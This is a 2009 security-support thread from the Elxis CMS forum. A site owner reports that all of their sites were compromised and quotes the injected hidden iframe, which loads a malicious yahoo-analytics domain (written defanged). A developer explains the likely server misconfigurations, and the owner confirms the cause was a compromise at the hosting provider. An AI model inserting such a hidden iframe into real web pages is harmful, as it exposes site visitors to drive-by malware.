Elxis CMS Forum
Support => Security => Topic started by: speck on December 15, 2009, 01:44:33
-
:o
all my elxis sites today has been hacked.
i found in all html pages and in all index.php this code
<iframe src="http( : )//stats(.)yahoo-analytics(.)net/lib/index(.)php" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
is it a dangerous software so now on google two sites are segnaled like suspiciuos >:(
what depend this??
server?
elxis?? strange because defender is on and works nice
or other??? maybe someone hate me :o
what do i do to prevent another thing like this ??? ???
I'm angry >:( >:(
thanks for you advices :)
-
I am sorry speck.
From other similar attacks in the past we have seen that, almost always, the cause of the hack is an in-secure site enviroment and bad server/php set up (allow_url_fopen and register_globals are the most common causes for a successful XSS attack). Elxis defender prevents attacks against to Elxis with requests matching the defender criteria. If you have more scripts on your site except elxis, then those can not be protected by the Elxis Defender.
I advise you to search your apache's log file to find out the cause of the hack. A google search may also tell you important information about the origin/method of the attack.
http://google.com/safebrowsing/diagnostic?site=yahoo-analytics.net/ (http://google.com/safebrowsing/diagnostic?site=yahoo-analytics.net/)
-
I made a search of google before to post, but i was ensecure if that depended by elxis or not.
Luckely not by elxis and about your answer not for scrips in my elxis sites. I don't use them, always your mention is about external scripts.
It was a general attack at some servers of my provider. In fact, after a hard day to restore all my sites, yesterday night, in europe late morning, the provider has restored all servers.
thanks a lot Ioan, as always you're very kindly with your answers and support ;)